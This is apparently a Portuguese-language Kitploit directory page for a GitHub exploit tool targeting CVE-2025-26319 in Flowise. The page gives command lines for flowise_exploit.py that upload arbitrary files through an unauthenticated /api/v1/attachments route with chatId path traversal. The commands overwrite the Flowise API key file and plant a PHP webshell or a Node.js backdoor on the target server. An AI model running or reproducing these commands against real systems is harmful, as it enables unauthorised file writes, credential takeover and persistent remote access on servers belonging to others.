Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-26319 | Kitploit
Ferramentas/GitHubGitHub/redpack-kr/cve-2025-26319
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubredpack-kr/cve-2025-26319

CVE-2025-26319

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-26319

  1. Upload básico de arquivo python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
  2. Upload de arquivo de configuração

Modificar configuração da chave da API

python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Gerar e enviar webshell automaticamente

Enviar webshell PHP

python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

Enviar backdoor Node.js

python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

Princípio do ataque Explora a rota /api/v1/attachments que está na lista de permissões e não requer autenticação Executa path traversal manipulando o parâmetro chatId (../../../) Faz upload de arquivos arbitrários para qualquer local no sistema de arquivos do servidor

Baixar ferramenta